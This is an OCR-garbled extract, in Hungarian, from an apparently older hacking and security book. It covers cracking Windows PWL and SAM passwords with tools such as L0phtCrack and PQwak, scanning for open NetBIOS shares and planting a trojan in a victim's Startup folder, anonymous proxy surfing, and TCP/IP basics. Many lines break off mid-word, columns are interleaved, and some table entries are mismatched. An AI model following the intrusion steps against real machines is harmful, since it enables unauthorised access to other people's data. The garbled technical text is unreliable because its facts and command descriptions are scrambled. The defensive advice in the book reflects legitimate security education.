neve lesz. tehát a c:\windows\ alatt. Jelszavak ezreit törték fel de. illetve ezek bizonyos területeit.de Internetezzünk olcsón sokkal több nem is kell hozzá Az így tárolt információkat egy jelszófeltörő segítségével nagyon könnyű kiolvasni.2 A jelszófájlok A Windows 95/98/ME PWL fájlokban tárolja a jelszavakat és a felhasználói neveket. A Windows minden PWL-fájlt a Windows könyvtárban tárol. 2. Az Internet Explorer a 4. 10:30 .. A hackerek a jelszavakat még az idevágó weboldalakon is nyilvánossá tehették .számol be a Der Spiegel hírmagazin nemrégiben megjelent tudósítása. 30 feltételezett tettesből álló kör több ezer számítógép-felhasználó jelszavát törte fel . (dpa) Forrás: www.pwl lesz.

Ez a Windows jelszó mellett a hálózati jelszót is őrzi. a frissítés egy erősebb kódoló algoritmusra. és az. és hogy melyik felhasználói csoporthoz tartozik. Sajnos ezt a kódot a megfelelő eszközzel másodpercek alatt fel lehet törni. A Windows 2000 ellenőrzi minden jelszó hosszát. microsoft. Ezzel a kóddal és az RC4 algoritmus egy változatával kódolják az adatokat a PWL fájlokban. illetve feltörését. és ezzel lehetetlenné teszi a kiolvasásukat is. a fogadó pedig ugyanezzel a kóddal fejti meg az üzenetet. Ezeknek az adatoknak az alapján a Windows 2000 ki tudja számítani a jelszavak biztonsági kockázatát. amelyek lehetővé teszik a célszámítógép valamennyi jelszavának azonnali kiolvasását.csak ellenkező irányban. valamint a fájl létrejöttének a dátumát. s automatikusan figyelmeztet az általános jelszóbiztonság elleni vétségekre.3 Jelszavak a Windows 2000 alatt A Windows 2000 alatt egészen más a jelszavak kezelése. Egy PWL fájl tartalmaz egy header-t. Ha Windows 2000 alatt bejelentkezik egy felhasználó. továbbá úgynevezett rekordokat is tárol. a jelszavak rendszeres változtatását és a karakterek sokszínűségét. ehhez számtalan eszköz áll a hackerek rendelkezésére a hálón. a Windows 95/98/ME alatt lehetőség van a HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion \Policies\Network \DisabledPwdCaching = 1 Registry-kulcs létrehozására. Jelszófeltörők Mint már említettük.2. hogy a jelszófeltörők elérjék a PWL fájlokat. amelyek lehetővé teszik a Windows jelszavak kikódolását. Hátrányként jelenik meg a kódkicserélés problémája és a ráfordításigényes kódnyilvántartás. 2. A nagyobb PWL A számokból és betűkből álló kombinációk a jelszófeltőrőket is megizzasztják . Mindegy. Védelmi lehetőségek Hogy a jelszófeltörő programoktól megvédhessük magunkat.asp oldalon juthatunk hozzá. illetve kiolvasását. a kód mindig ilyen hosszú. mivel a Windows állandóan használja. mint a Windows 95/98/ME alatt.com/support/kb/artícles/Q132/8/07. és szükség esetén figyelmezteti a felhasználót. A SAM azokat a felhasználói adatokat használja. A Windows valamennyi jelszót egy SAM (Security Account Manager)adatbázisban tárol. amelynél mindkét kommunikációs partner ugyanazt teszi . Az RC4 egy szimmetrikus kódolási eljárás.A kódolás A Microsoft a Windows 95 első verzióiban nem nagyon strapálta magát a kódolás algoritmusával. A feladó egy kulccsal kódolja az átvitelre szánt adatokat. Ehhez az update-hez a http://support. főleg a Windows 95 felhasználóknak. Ezt a fájlt nem lehet közvetlenül elérni. amelyeket egy másik számítógépre másolhatnak. Ilyenkor a hackerek gyakran lemezre menük a PWL fájlokat. Továbbra is ajánlatos azonban. a Windowshoz sok jelszófeltörő van. ráadásul a trójaiakba is gyakran integrálnak olyan programokat. hogy ott zavartalanul és időkorlát nélkül kikódolhassák. amelyben rögzítve vannak a hozzáférési jogai. A szimmetrikus kódolás előnye mindenekelőtt a kódolás nagy sebessége. Van egy program is. hogy az eljárást könnyű implementálni. Ez a kulcs megakadályozza a megadott jelszavak tárolását. az adatai a Security Account Manager-hez továbbítódnak. A Windows 2000 automatikusan ellenőrzi a jelszavak biztonságosságát. amelyek a tulajdonképpeni jelszavakat tartalmazzák. A következő verziókban már olyan kódolási technikákat használtak. amelyeket ugyan továbbra is számos segédprogrammal fel lehetett törni. hogy a jelszó hosszabb vagy rövidebb 32 bitnél. mindez azonban már sokkal több időbe telt. fájloknál azonban sok idő kell a jelszavak kiolvasásához. ami viszonylag egyszerűvé tette a hackereknek ezek megfejtését. A felhasználói névből és a jelszóból a Windows 9x egy 32 bit hosszúságii kódot generál. ez az adatbázis a Registry része. amely megakadályozza a jelszavak kiolvasását. amelyeket a winnt/ system32/config/sam fájl tárol. A PassSecure a Multimedia Network Systemstől meggátolja. s egyfajta „jogosultsági igazolványt" kap.

amelyet a hackerek okoznak. amelyeknek a felhasználói minden meghajtót megosztottak. vigyázat! Egyet világosan kell látni: egy távolból jövő támadás egy Windows 95/98/ME rendszer ellen. egyedüli PC-ként és trójai nélkül. elég idejük van a hackereknek arra.3 A távoli elérésű támadás . valóban nehéz. hogy mennyire könnyelműen mozognak egyesek a hálón. A könyvhöz végzett kutatások során valóban találtunk olyan rendszereket.Időközben azonban számos Brute Force program is íródott. (A jelszófeltörés témáját a 7. szabvány konfigurációban. A kár. . Azonban a strandard konfigurációt gyakran meg kell változtatni.internetvagy hálózati felhasználók. Ebből a fejezetből kiderül. hogy továbbra is használni tudja a régi PC-jét. Ez a program úgy kerüli ki a hozzáférési védelmet. Az adathordo- E szolgáltatások felhasználói általában nincsenek tisztában azzal. Mióta egyre több felhasználó épít ki otthon is kis hálózatocskát.tolvajkulcs a Windows 2000 jelszavakhoz A LOphtCrack kétféleképpen tud jelszavakat feltörni. hogy a cél érdekében számtalan támadási módot kipróbáljanak. Az egyik legismertebb közülük a legendás LOphtCrack 2. Az ilyen esetek természetesen durva gondatlanságról tanúskodnak. 2.és nyomtatómegosztás veszélyes biztonsági rések A fájl.3. zók minden védelem nélküli megosztása vagy a slamposan megadott jelszavak gyakran szélesre tárják a kaput a betolakodók előtt.5 . például a rendszer hálózatra csatlakoztatása miatt. hogy milyen veszélyeknek teszik ki az adataikat az internethez kapcsolódással. az xDSL és a flatrate-ek korában. A második a brute force cracking. hogyan lehet felderíteni az ilyen megosztott erőforrásokat. LOphtCrack 2. amelynél gyakran használt jelszavak és karakterek listáját használja.5. ahol minden lehetséges szám és/vagy szókombinációt kipróbál. fejezet részletesen újratárgyalja. vagy hogy időnként csatlakoztatni tudjon egy notebookot. Ráadásul az ISDN.1 A fájl. amelyet nem veszünk észre 2. hogy milyen megosztásokat használ a felhasználó. amelyek az NT és a Windows 2000 alatt is lehetővé teszik jelszavak hackelését.) Itt egy kockázati tényező rejtőzik. amikor a felhasználók rendszerei gyakran folyamatosan kapcsolódnak az internethez. hogy a háttérben egyfajta másolatot készít a SAM-fájlról. így például a rendszer különböző réseinek a szkennelését. főleg attól függ. hogy lehetővé tegyék a felhasználóknak a mappák vagy az adathordozók elérését a hálózaton. a megosztás a magánemberek számára is a biztonságot meghatározó témává vált. méghozzá minden jelszóvédelem nélkül. hogy kitalálja a jelszót. ugyanakkor újra bebizonyítják. Az első módszer a dictionary cracking.és nyomtatómegosztást tulajdonképpen arra használják.

Név Auto NetBIOS Hacker Légion NAT SharesFinder URL www. A megosztások felkutatásához elegendő a számítógép IP-területe Csak a számítógépről szállít információkat.2 Mik azok a szkennerek. Kapcsolódás egy másik számítógéphez. Sajnos. UNIX/Linux Windows 9x/NT/2000 Programok a megosztások felkutatásához Hozzáférés a szabad erőforrásokhoz A talált megosztott erőforrások elérése a következők szerint történik: a támadó egyszerűen beírja a talált IP-címet a Windows Intézőbe. Az egyik legismertebb ilyen a Légion.hackerzbook. Nem nehéz felismerni a lehetséges kockázatokat és károkat. és hogyan működnek? A megosztások felkutatása szkennerprogramokkal történik. ami több szkennelést tesz szükségessé. A következő ábra a megosztott C: merevlemez tartalmát mutatja egy. például a Légiont kell használni. a Légion nagyon megbízhatatlan.hackerzbook.2.hackerzbook.59.de www. és nem mindig találja meg azonnal a megosztott erőforrásokat. és semmilyen támadóeszköze nincs.de Operációs rendszer Windows 9x/NT/2000 Windows 9x/NT/2000.3. Az előnyei a Légionnal szemben a nagy megbízhatóság és a nagyon gyors szkennelés. . UNIX/Linux Windows 9x/NT. A Légion minden megosztást szkennel a számítógépen. a Rhino9 szerzeménye.3.hackerzbook.de www. majd grafikusan megjeleníti ezeket. hogy a jelszófeltöréshez egy másik eszközt. fájlmegosztással Egy másik a Lan Guard Network Scanner.161. A szkennelés eredménye A DOS alatt a NET USE paranccsal is lehet kapcsolatot teremteni. a hálózaton keresztül elért számítógépen. ami azt jelenti.de www. például \\217.

3. pl. vezetékneveket. jelszó. Shane Hird műhelyéből Ez az eszköz többek között a Windows 95/98 alatti fájlmegosztás egy implementációs hibáját használja ki. rendkívül hatékony is lehet. admin. Ezzel megvalósíthatjuk. vagy manipulálni a behatolók Persze ez a védelem a szimpla jelszavak esetén meglehetősen sovány. keresztneveket. a fájl törlődjön. vagy a kedve szerint törölhet. A legegyszerűbb védelem: jelszavak az erőforrásokhoz 2.. boss. ha kap egy hibajelzést. hónapnevek vagy teszt. hogy a trójai szerver része (közelebbit lásd a trójaiakról szóló fejezetben) a következő bootolás után telepítődjön. hogy senki se férjen hozzájuk jogosulatlanul a hálózatról vagy az internetről. De vannak gyakran használt szabvány jelszavak is. és ezeket jelszóként végigpróbálgatja. születési adatokat. ahol megvan a lehetősége. Nehéz jelszavaknál ez természetesen meglehetősen értelmetlen vállalkozás.5 Brute Porce-rohamok a megosztási jelszavak ellen A legjobb és legismertebb ilyen programok egyike a PQwak. gyakran hebehurgyán felhasznált jelszó közül. hogy végiggondolja a felhasználó minden ismert személyes adatát. mint például gast. ahogy neki tetszik. amit némi tudással vagy megfelelő programmal könnyen ki lehet kerülni.3. de hogy a felhasználó egy trójai becsempészésére fog-e gyanakodni. kutya nevét. . amely Brute Force-rohamot intéz a NetBIOS jelszó ellen. a szisztematikus találgatás.Így lehet DOS alól elérni a másik számítógépet 2. hogy csak néhányat említsünk a számtalan. ami a helyi hálózaton. feltölthet. Annak megfelelően. 2. Ezt a beavatkozást esetleg észreveszik. hogy mi mindent tudnak megváltoztatni. Ezzel elérhető. Az is köztudott. a betolakodó másolhat. amit egy hacker programok segítsége nélkül is megtenne. administrator. és több sikerrel kecsegtető módszerek után néz. Egy példa arra. hogy a felhasználók kényelemszeretetből gyakran könnyen megjegyezhető jelszavakat adnak meg. Egy különösen kedvelt támadási mód egy trójai vírust elhelyezni a C:\WINDOWS\STARTMENÜ\PROGRAMOK\INDÍTÓPULT könyvtárban. Ilyen lehet például egy program.3 Milyen lehetőségeik vannak a betolakodóknak? A megosztott mappát vagy meghajtófájlokat a megosztás módja szerint lehet elérni. barátnő. Az első. az bizony kérdéses.4 Jelszóval védett megosztások A megosztott erőforrásokat természetesen jelszóval lehet védeni. Kezdhetné azzal. amit valamikor a potenciális hacker is fel fog adni. hogy milyen hozzáférési módokat adtak meg..3. és a szerver elinduljon. hogy a felhasználót személyesen is ismeri. törölni.

ismertebb nevükön a trójaiak segítségével. hogy teljesen az uralmuk alá hajtsanak rendszereket. és aki sikert akar elérni. hogy a bonyolult támadásokkal ellentétben. köztük a NetBIOS-t is távolítsuk el.Előkészület a célzott támadásra Ez a megoldás azonban sok felhasználó számára szóba sem jöhet. eljárásokat indítsanak vagy fejezzenek be. A trójaiak a felépítésüknél fogva kitűnően alkalmasak arra.3. Az ilyen programok felhasználói ritkán gondolkodnak el cselekedetük következményeiről. Egyre jobban elterjednek a trójai-. Ezeknek a programoknak a problematikája az egyszerűségükben rejlik.6 Óvintézkedések A legegyszerűbb. A PQwak minden karaktert és különleges karaktert felismer. hogy egy bizonyos idő múlva a még oly türelmes hacker is feladja. Itt újból bizonyítást nyer az alfanumerikus kombinációk erőssége. manipulálják a Registry-t. Tulajdonképpen csak erős jelszavak jöhetnek számításba.betörés a hátsó ajtón keresztül Nagyon elterjedtek a támadások a hátsó ajtók. hogy ne nyissák meg gondatlanul a mail-ékhez csatolt fájlokat. amelyek védik az erőforrásokat. adatokat másoljanak. amit tehetünk. Mind gyakrabban használnak tűzfalakat. ami azt jelenti.és nyomtatómegosztás megszüntetése a hálózati környezet beállításainál. de jelentősen megnehezíti a betörést. és kiindulhatunk abból. illetve a Remote Controll programok. és ennek megfelelő agresszivitással támadnak áldozataik rendszereire. illetve víruskere- . ha védekezni akarunk az ilyen támadások ellen: a fájl. illetve töröljenek. mivel rá vannak utalva a megosztott erőforrások használatára. A PQwak l . 2. természetesen vannak még más támadási lehetőségek is. Szerverkörnyezetekben a rendszeradminisztrátor beállíthatja a jelszavak erősségét és futási idejét.4 További támadási technikák A bemutatott biztonsági réseken kívül. 2. amelyek külön fejezetet kaptak a könyvben (lásd 4.0-s verziója nincs túl gondosan programozva. így azután a legrövidebb idő alatt szinte minden jelszót fel lehet vele törni. Aránylag kényelmetlen. és amelyekre most csak röviden szeretnénk kitérni. A PQwaknak egyszerűen meg kell adni annak a számítógépnek az IP-jét. és egyre gyakrabban figyelnek oda arra. Ez ugyan nem kínál százszázalékos védelmet. amelyek az operációs rendszer felépítésében gyökereznek. de veszélytelen . hogy jelszavakat kémleljenek ki. itt semmiféle háttértudás megszerzésével nem kell foglalkozni. amelyeket most csak bemutatunk. és megosztásokat hozzanak létre. Ez különösen a „szabadidős hackereknek" nyújt lehetőséget arra. sok különleges karakter hiányzik. Továbbá minden szükségtelen protokollt. A felhasználók magatartása különösen a médiák felvilágosító tevékenysége nyomán az utóbbi években erősen megváltozott.megszüntetjük a megosztásokat Trójaiak . annak gyakran kell újraindítania. amelynek a jelszavait fel kell törnie. fejezet). amelyek megakadályozzák a trójai szerver kapcsolódását a klienshez.

. De még mindig elég sok felhasználó van. akikben nem tudatosultak ezek a veszélyek. amelyek vállalati hálózatokban működtek. mint a Sub7 vagy a BackOrifice (pontosabbat ezekről a programokról a trójaiakról szóló fejezetben) települtek olyan számítógépekre. Ez a magatartás durván felelőtlen. és fütyülve minden figyelmeztetésre. A védekezés és a felismerés lehetőségeivel ugyancsak a trójaiakról szóló fejezetben foglalkozunk. de a rendszergazdák valószínűleg csak a káresetekből fognak tanulni.ső programok is. ismeretlen és komolytalan forrásból származó fájlokat nyitnak meg. amelyek képesek észlelni és eltávolítani a szerveralkalmazásokat a rendszerben. A gyakorlatból ismerünk olyan eseteket. mikor már régóta ismert trójaiak. illetve megfelelő figyelmeztetésekkel megakadályozni a telepítésüket.

3 Néhány alkalmazás és protokoll használata és a biztonságosságuk ...2 Az FTP 3...1 A legtöbb felhasználó sokat elárul3..1.1 Mi a TCP/IP? 3...2 ......... 3..3.. Az IRC 3.....1 A Telnet 3..1.....2...4 Az IP-címzés 3......3..... A TCP/IP 3.....2...Tartalom 3.......4 A portokról .1 Az anonim internetezés csökkenti a kockázatot . Névtelenül 3..3...3..2............ 3. fejezet ...2 Különböző protokollok a rétegekben 3...3.3...

net/anonymizer oldal teszi világossá. A parányi GIF-képecske (egy pixel méretű).mert egy hacker nem jeC-nk szempontjából . nagyon pontos címzés.1. az időpontot. és esetleg károkat nekünk. Ennek a fejezetnek az első része azt is milyen információkat kaphatnak rólunk mások. a felkeresett oldal URL-jét. mivel egészen k átadja egy szervernek az IP-címet. Mindkettő hasonlít a talán már ismert cookie-khoz. egy emelettel és lakásszámmal együtt tacímhez hasonlít. . stratégiáiról és őségeiről. de amint ez ismertté válik. amit az anonim szörfözésnél el kell titk tuális IP-cím.1 A legtöbb felhasználó sokat elárul e többet megtudni a hackerek tevékenységéről. hogy kiderítse a lakásunk. amelyek alapján hackerek figyelhetnek fel ránk.tudnia kell a pontos címet. a b valamint egy korábban elhelyezett cookie információit. személyes adatokat adunk meg. Csak ezután á. amelyek lehetővé tesznek bizonyos tákat.kockázattá. amelyek a „hacker és egyben a védekezés alapismeretei közé is tartoznak. és gyakorlatilag úgy működik. min csak ebből semmit nem lehet észrevenni. és ez gük lesz pontosan kideríteni az identitásunkat. Ez den bemutatja a legfontosabb információkat. E mmi sem történhet. a ek URL-jét. annak az internet alapjaival is közelebbi ismeretségbe Különben bizonyos támadási lehetőségek aligha követhetőek. Aki csak általában akar a hackerek tevékenységéről tájékozt a fejezetet természetesen nem kell elolvasnia. és a nézőnek egyáltalán nem tűnik fel. ha „normál" mó- Egy szituáció. Az IP-cim minden alkalommal átmegy az adatokkal együtt. suk a legfontosabbakat a névtelen szörfözésről .ok don szörfözünk a neten.a PC-nk nyitott portjához hasonlóan . A kis web-bugokról van szó. Hogy ezeknek a részleteknek a nyilvános hogyan akadályozhatjuk meg. amelyet minden számítógép az internetre lépéskor k Az interneten megtett utat. amint az a lenti példából is lá könnyen követni lehet az IP-címek segítségével. amikor a web-bugot megnézték. Ezzel akkor kell foglalkozdünk a háló kémlelésének. akkor ID-vel együtt lehet tárolni. arról természetesen szintén itt olvas 3. GIF-ekről. Ha egy o tartalmaz ilyen „bogárkát". illetve a házunk gyenge pontjait. és kikapcsolni sem lehet Tehát a legfontosabb. igen jó rálátás kíetkörülményeinkre és a szokásainkra. Így viszont sok emenően érthetetlen marad. ICQ vendégkönyvekben és a nyílt fórumokon. A „normál" és az anonim szörfözés közötti kü http://privacy.hiszen a névjegym osztogatjuk mindenütt. anonim internetezés csökkenti a ckázatot et az anonim szörfözésnek szenteltük. Így némi erhető a technikákba is. Csak ennek az adatnak az ismeretében válik a aablak . a m IRC. amelyben öntudatlanul is feladjuk az anonimit valószínűleg a legkevésbé tűnt fel. hogy megakadályozzuk saját IP-címünk átadását jobb megértés kedvéért képzeljük el egyszer az IP-címet a követggésben: egy potencionális betörőnek . amely valahol a webo tegrálva. Mindenhol h nyomokat. szörfözés célja.

1. a ho „hiszi" (az IP alapján). azt mindjárt kiderül.2. Azon tőség is van arra. ben a böngésző ismeri ezeket (az e-mail-címet a böngésző jelszó tadhatja egy anonim FTP-szerverhez való hozzáféréshez.com/lists/proxy/ címen találunk listát. Íme.com. ahogy az előbb már említettük.net címről. csak a szerver címét és a por gésző Internet-beállításainál (legjobb. vagy talmakon keresztül. néhány ezek közül: ez tartozó domain név. Ebből a rövidítésből g az is kiderül. 3. mint minden más. és nem a din IP-t mutatják. Egy másik egyszerű módszer egy anonim proxy-szerveren figurálni a saját böngészőnk kapcsolatát. 2. Hogy mo konfiguráljuk a böngészőnket. hardverként vagy szoftverként. amelyről az oldal linkjére kattintottunk (HTTP- s A legegyszerűbb. például Mozilla/4.2 Névtelenül A cél tehát az. és lehetőség szerint minden egyéb adatunka Egy előzetes megjegyzés: a saját IP-címünk egy internet-sz resztül történő szörfözéskor rendszerint dinamikus. hogy mégiscsak m valamennyire az anonimitást az internetes szörfözéskor. Így például le tudja nyomni a weboldalakon található .2.de természetesen újból olvasni. az Anon használata. Magunk is beszerezhetünk egy proxy-programot vagy egy ul a http://proxys4all. csak annak a weboldalak az információi kerülnek ki. idítés a használt webböngészőhöz. és az ott tartózkodás ideje. hogy a következő adatok mindegyike. és a hostnak a proxy IP-t.de vagy a klassziku anonymizer. Az IP-cím és az útvonal mellett előfordulhat. mint a JavaScript és hasonlók). vagy legalábbis néhány közülük hatóvá válik idegenek számára: Talán már a fentiekből is világossá válhat. hogy milyen operációs rendszer melyik verzióját uk. Ehhez egy kis m proxyk. ha minden protokoll Az aktuális proxy-szerverekről és csatlakozásaikról a cyberarmy.junkbister.7 [en] (X11. (ezek egy táblát akasztanak ránk.co kezdőknek kicsit nehezebb ennek a szoftvernek a telepíté szont kedvezőbbek a lehetőségek. hogy titkosítsuk a saját IP-címünket. gésző az e-mail-címeket és/vagy a login neveket is továbbítja. amelyet a számítógép egy oldalhoz választott. Tehát a proxy képviseli a számítógépünket. Az ilyen oldalak működési módja: az proxy-szerver többé-kevésbé szűri. a kliens és a hos vannak kapcsolva. hogy: „Megint itt vagyok!") az interneten.Információk az Anonymizernél Úgy az IP. mint a teljes útvonal is felismerhető. A kliens tehát össze van kötve a hosttal. hogy védekezzünk. itt például Linux 2. l URL-je. Ha ezt az oldalt most egy anonymizeren keresztül keressük fel. Vanna keresőgépek is és hasonlók. amelyről erre az oldalra mentünk. Hogy hetséges. mert egyéni igények szer ható.cgi. tehát a szolg újabb betárcsázáskor egy új. hogy csak (!) a proxy-szerverrel van ben. Mostanában a Junkb jött divatba (közelebbi információk a www. például a http://anonsurf. másik IP-t oszt ki . egy mási milyet se mutassunk.12-t egy Intel PC-n.12 i686) a Netscape-hez (angol verzió). fent nevezett információt.

beleértve az online és az offline módok tást is. A JavaScript utólag mégis áthúzhatja a kat. akkor beszerez mag shell-accountot. hogy mi kerüljön a cache-be.i eszköz a jelenleg csak kevesek számára elérhető Mix-System.0-s verzióban jelent meg. A kommunikáció a Mixen belül kódolt. n nem működik hibátlanul. amelyekre rá de még nincsenek a cache-ben. és lehetővé teszi. csak egyes teket lehet találni. amiről sen megfeledkeznek. azonban más háló sokra is átvihető. latnál fog betölteni és hasonlókat. a program lehet érdekes. hogy milyen felhasználói névvel jelentkezzen be FTP-szerverre. Így nem lehet összefüg teni a bejövő és a kimenő üzenetek között. hogy a csatorna előfizetője már nem anoni tokat egy szerverről. ezért ennek a leírásáról itt lemon akiknek egy kicsit több idejük van és Linux-pártiak. Minden Mix gyűjti a bejövő üzeneteket. A Webwasher. A WWWoffle Unix/Linux rendszerek s NT alatt fut. Ez a proxy elsősorban cache-elő verként működik. vagy kiköthe volítsa el a HTML-kódból a Java. a böngészőben általában külső URLtintani vagy be kell gépelni ezeket. hogy a Webwashert használja. állomásból áll. és nem kell ezt a véletlenre vagy a webböngé tett alapértelmezésre bízni. feljegyzi egy listára. A koncepciót um eredetileg e-mail küldéshez fejlesztette. Az eg tő veszély itt is az. megadhatunk egy URL-listát. Létezik ugyan egy verziója Windows 95-höz is. amelyről az oldalra kattintottak. inkább kapcso • Ha egy hacker valami nagyobbat tervez. és így sem lehet. Pontosan megadhatjuk. amelyet minden esetben ki kell y át kell engedni. Alapértelmezésként ez st kap. Mindez a ra védelmét szolgálja. ilyenkor po adhatjuk. er Windows 95/98/NT/2000-hez és a Macintosh-hoz is meg ősorban arra szolgál. E letilthatjuk a frame-ek vagy a képek letöltését. hogy milyen fajta webdoku milyen HTML-kódba integrált scriptek megengedettek. • A proxy-knál még egy fontos szempontra kell ügyelni. ő eszköz. Ha csak egyeden gbízhatóan működik. A cache-tartalmon belüli k egészítésképpen saját keresőgépet is lehet telepíteni. hogy nagy hálózati terheltséget Mixek még nem állnak nyilvánosan rendelkezésre. és megtalálható a w. A mi szempontunkból azonban inkább onságai érdekesek: a Webwasherrel megakadályozható a erer küldése.vagy a JavaScriptWWWoffle-t FTP-proxyként is lehet használni. amelyeket a következő online kapcso- • Egy további kis anonimitási rés csak az Internet Explorer felhasz nyes: ezek az Active Channelek.de címen. kilistáztatául az összes. Hogy meghat mációkhoz juthassunk. amely az anonimitásról gondoskodhat. a valóban a sző által elküldött sztringeket küldi el. azé az URL-é. itt is célzottan lehet definiá headert. a Webwasher. Tehát: ha nincs rá feltétlenül szükségünk. vagy a legutóbbi kapcsolódás során meglátoga esetleg minden oldalt. Még ha valóban anonim proxykat is használunk. A mi szempontunkból a WWWoffle főleg azért lehet a Junkbusterhez hasonlóan. Ez a technológia először Internet Explorer 4. Sajnos a JavaScript funkciókat minden böngészőnél lehet célzottan inaktiválni. az animált képeket és a pop-up menüket. user agentként. vagyis a anonim marad. szét és egy bizonyos idő után továbbküldi. majd az emre váltáskor kérésre automatikusan betölti. és ezek után minden jogosultságot tesztel Sok szolgáltató kínál ingyenes shell-account-okat (ezek azonb . Az Active Channelekkel ki egyet egy webszerver-üzemeltető ajánlatából (kezdőlap). amel vagy az internetre kapcsolódás indításakor betöltődik (tehát b vagy állandó kapcsolat esetén a számítógép indításakor). Termés konfigurálható. mert megakadályozza az olvasó „zavará mtalan reklámbannerrel. ezt azonban lekapcsol Webwasher magáncélra ingyenes. s ezekről üzeneteket küldenek. A cachen különböző kritériumok szerint közlekedhetünk. A programot szőből lehet kezelni. az egész rendszer megbízható.webwasher. hogy hálózati kapcsolat ssen navigálni ebben a cache-ben. hanem minden elérésnél újból felismerhet érdeklődési köre a kiválasztott channel(ek) alapján meghat Active Channel technológia a már említett cookie-k szemé használja. hogy kiszűrje a weboldalakról a nereket. egy w ködtetője egy JavaScripten keresztül továbbra is le tudja kér címeket. A Mix hátránya. Az oldalakat.

, vagy vannak hackeroldalak, amelyeken frissen feltört accountin-ek vannak, amelyeket használni lehet.

ackerek többnyire olyan rendszereket használnak platformként dszerek megtámadásához, amelyeket már a hatalmukban tartanak, mális (legális) szörfözéshez az említett lehetőségek is teljesen ele-

Hogyan működnek a protokollok? A két protokoll, a protokollok egymásra rétegződésén, „hal stack) keresztül működik. A protocol stack az az út, amelyet az a kell tenniük ahhoz, hogy az egyik számítógépből a másikba jussa amelynek a rétegei közül a TCP/IP csak kettőt, nevezetesen a 3 használja, a következőképppen van felosztva:
Réteg Alkalmazási réteg Megjelenítő réteg Leírás

n valaki, a fenti tanácsokat megfogadva, elrejtette az IP-címét, rogram csak a proxy-szerverről gyűjthet „személyre szabott" inmivel nekünk, felhasználóknak, nem sokat árthat.

Az alkalmazási réteg képezi a csatolófelületet az alk A megjelenítő rétegben a másik számítógép rendsz

között, amelyekkel a felhasználó parancsokat küld illetve fogad egy hálózato felhasználás-specifikus formattálások történnek. Session réteg

Ez

CP/IP

gondoskodik arról, hogy az alkalmazások között megszakadt kapcsolatok helyen is folytatódjanak. Transzport réteg Ez a réteg gondoskodik a

felálljanak és - az adatvesztés megakadályozása miatt - részben ugyan

akaszban néhány protokollt szeretnénk megismertetni, amelyeket álnak. A legfontosabbak közé tartozik a Transmission Control és az Internet Protocol (IP). vetkező részben a protokolloknak azok a funkciói szerepelnek, lözhetetlenek a későbbi célokhoz, így ennek a könyvnek a hasztt közölt tudás tökéletesen elegendő. Sajnos a téma olyan kompes kifejtése messze meghaladná e könyvnek a kereteit.

adatátvitelről a két számítógép között, és gyakran csatolófelületként is szolgá alkalmazási rétegek és az alá rendelt hálózati rétegek között. Hálózati/

Ebben a rétegben folyik az optimális út (routing) keresése az kapcsolati ré (pl.: IP). Adatbiztonsági réteg réteg

adatátvitelhez. A protokollt itt már a fölé rendelt rétegektől függetlenül ki leh

Ez a réteg arról gondoskodik, hogy lehetőle

hibás átvitelek, és ha mégis lennének, akkor az adatok helyre legyenek állít illetve küldésekor.

Ez a réteg felelős a fizikai kapcsolat létrehozásáért az adato

a TCP/IP?

két hálózati protokoll neve, amelyeket az interneten és a modern használnak: az IP azonban csak két protokoll-fajta a TCP/IP protokoll-csa-

sion Control Protocol (TCP) és Internet Protocol (IP).
A TCP IP-protokollhalom rétegei az OSI-modell szerint

rotokoll-család a háló minden szolgáltatását elvégzi, ide tartozik ldése, az adatok átvitele, hozzáférés a World Wide Webhez és az tása a usenet-en keresztül.

Az adatok a számítógépből kifelé tartva az ábrázolt sorrendb resztül ezeken a rétegeken, és fordított sorrendben mennek bef szerbe. Minden réteg tud adatokat küldeni a szomszédos rét adatokat fogadni attól. Valamennyi réteg protokollokkal van öss lyek különböző szolgáltatásokat nyújtanak.

önböző protokollok a rétegekben

Parancs Chown

Leírás Egy egyszerű szövegszerkesztő.

lán valamivel érthetőbb, hogyan történik a protokollhalmon keok küldése, illetve fogadása. Most megnézzük egy kicsit közeböző rétegek legfontosabb protokolljait.

Megváltoztatja a tulajdonost és a csoportot, amelyhez eg

és/vagy egy fájl tartozik. joe

A legfontosabb Telnet-parancsok

si réteg FTP

g, amelyben a felhasználó közvetlenül egy alkalmazásba írhatja t, hogy kapcsolatot nyisson egy számítógéppel, vagy megfelelő jon ki. Fordított értelemben tehát az alkalmazási réteg az a réteg gy alkalmazás az A számítógépen a B számítógéptől is megkapait. Ebben a rétegben egész sereg protokoll van, és ezeket felülárolja semmi. Bizonyos alkalmazások itt más alkalmazásokra is en például a HP egy SNMP-re épülő programja, az OpenView. nézzük ennek a rétegnek az alkalmazásait!

A Fik Transfer Protocol egy szolgáltatás, amely minden operá belül lehetővé teszi az adatok átvitelét és azoknak a mindenkori ban mentését. Mint tudjuk, a legtöbb operációs rendszer különb tumokat használ. A Unix és a Unix-klónok gyakran NFS-t System) használnak, az OS/2 általában HPFS-t (High Performance DOS/Windows pedig kizárólag FAT-et (File Allocation Table) v Windows 2000 és az XP ezenkívül még az NTFS-t is segítség FTP-n keresztüli kommunikáció, akárcsak a Telnet, a kliens-sz épül, de valamivel komplexebb. Ebbe nem akarunk részletesebb azonban a következő pontokat megemlítjük: A kommunikáció öt fázisra osztható:
Fázis 1. fázis: Leírás

k elején még nem voltak igazi hálózatok. Voltak viszont nagygée terminálokat csatlakoztattak. Egy terminál akkoriban csak káztül tudott adatot cserélni a nagygéppel, a további terminálokkal án nem kommunikálhatott. Hogy egy újabb kábelrengeteg létesí, szoftveres megoldásra volt szükség. Így jött létre a Telnet, amely a felhasználóknak, hogy úgy tudjanak adatokat szerkeszteni stb., ülnének a másik gép shell-je (DOS promptja) előtt. A felhasznázvetlenül az alkalmazásnak kiadott paranccsal nyitott meg egy legfontosabb Telnet-parancsokat az alábbi táblázat tartalmazza.
Az aktuálisan

A kliens kérdést küld a számítógépnek, hogy a szolgáltatás

Kapcsolatfelépítés zésre áll-e, az pedig megerősítést küld, hitelesíti a felhas jelszót, és átküldi az átviteli opciókat és a fájlnev(ek)et. 2. fázis: portra vonatkozó információkat, és előkészítik a tulajdon-Adatátviteli kapadatátvitelt. Miután ezt rögzítették, elkezdődhet a tulajdon-csolat létesítése adatátvitel. 3. fázis: formában, aho-Adatátvitel gyan azt már leírtuk. 4. fázis:

Ki

Az adatátvitel az FTP-n keresztül történik, a

Leírás Létrehozza a New nevű Megváltoztatja

